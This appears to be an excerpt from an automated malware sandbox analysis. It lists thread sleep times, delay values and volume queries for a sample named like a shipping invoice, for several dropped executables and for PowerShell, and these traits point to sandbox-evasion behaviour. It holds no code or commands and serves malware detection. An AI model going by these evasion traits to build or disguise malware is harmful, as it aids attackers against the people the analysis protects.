Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7376	Thread sleep count: 9135 > 30
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599687s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599544s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599432s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599321s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599170s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -599033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598659s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598436s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598327s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -598088s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -597969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -597663s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -597528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -597411s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596744s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596636s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596527s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596412s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596134s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -596013s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595879s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595740s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595622s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595296s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7464	Thread sleep count: 639 > 30
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594748s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594529s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594416s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -594078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593183s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -593078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592969s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592312s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -592093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe TID: 7268	Thread sleep time: -591984s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768	Thread sleep count: 5261 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7324	Thread sleep count: 8666 > 30
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -599828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -599528s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -599406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -599273s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598541s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598433s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598324s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598209s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597931s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597537s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597419s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -597093s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7324	Thread sleep count: 1138 > 30
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596390s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596280s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -596062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595843s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595734s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595515s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -595078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594967s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -594078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593859s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593640s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593531s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593297s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593187s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -593078s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe TID: 7244	Thread sleep time: -592968s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 4956	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7440	Thread sleep count: 3177 > 30
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7440	Thread sleep count: 6672 > 30
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599421s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599311s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -599094s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598875s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598656s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598547s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598433s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598212s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -598000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597891s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597766s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597656s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597546s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597438s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597313s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597188s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -597063s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596953s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596837s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596732s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596618s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596516s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596379s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596250s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596138s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -596031s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595922s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595802s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595688s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595563s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595438s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595313s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595203s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -595094s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594969s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe TID: 7436	Thread sleep time: -594360s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599687
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599544
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599321
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599170
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 599033
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598777
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598659
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598546
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598436
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598327
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598218
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 598088
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597663
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597528
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 597411
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596744
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596636
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596527
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596412
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596250
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596134
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 596013
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595879
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595740
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595622
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595513
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595296
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595187
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594968
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594748
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594529
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594416
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594297
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594187
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593507
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593406
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593297
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593183
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 593078
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592969
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592859
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592750
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592640
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592531
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592422
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592312
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592203
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 592093
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Thread delayed: delay time: 591984
